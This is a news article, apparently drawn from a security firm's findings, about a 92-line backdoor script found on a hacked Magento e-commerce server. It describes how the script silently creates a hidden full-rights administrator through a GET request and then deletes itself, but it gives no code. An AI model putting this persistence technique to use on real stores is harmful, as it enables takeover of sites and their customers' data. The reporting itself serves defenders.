Who needs a better mousetrap if the old ones are fine?
This was the approach of hackers who recently compromised a server running the Magento open source e-commerce platform. To prevent the server from being locked down if the legitimate operators ever discover a violation, the attackers have left a simple but effective script.
For the naked eye, the script was easily overlooked amidst countless other Magento files. Examination of the code contained therein, however, revealed that it was a back door that was activated by sending a simple and harmless looking web request to the server. This allows an attacker who might otherwise have been booted from the server to immediately become a server administrator with full control of the system.
The 92-line script, including comments and blank lines, is effective and easy to miss, said Krasimir Konov, a malware analyst at website security company Sucuri, who recently discovered it. One thing the script is not is new. Konov said it was pretty much a mirror copy of the code he first saw in 2012 and the examples that were later documented in 2013 and 2014.
"I would guess someone was too lazy to write their own script, so they just copied it from somewhere and used it in their attacks," Konov said Tuesday. "These scripts are just as effective, since only a few changes are required to work with newer versions of Magento."
The effectiveness of the back door lies in its ease of use. The administrator password and everything else that the attacker needs is encoded in the script. In the event that the hacker is ejected, all that is required is to send a get request to the location of the script file. The attacker now has a new administrator account that uses the user name, password, and email address of his or her choice.
The script contains a few more tricks for additional camouflage. The newly created administrator account acquires all rights, which means that it is likely to become a new administrative role for the website. This can hide the user if someone checks the list of administrators in Magento CMS. As soon as the new administrator account has been created, the script will delete itself.
Here are pictures and brief descriptions of the script:
Variables for creating the new user.
Make sure Magento is installed by looking for the a // Mage.php file.
Create a new user with the variables previously defined.
Give the new user all permissions.
Add the malicious user to the new role group.
Delete the script.
Konov said he was unsure of how attackers installed the script on the server he recently disinfected. Since Magento 22.214.171.124 was running on the web server, he suspects that one of the many security holes in this version has been exploited (e.g. this or this). He said he could not be sure because he had not done any forensic analysis.
However the back door got there, its continued use suggests that it will continue to work.
In a post published on Tuesday, Konov wrote: “If the back door is not properly removed from the surroundings of the website, the file can be kept and used again and again to add new users with elevated permissions – especially if a website owner knows nothing about it The infection or the thought that simply removing the new user from Magento is enough to prevent unauthorized access. "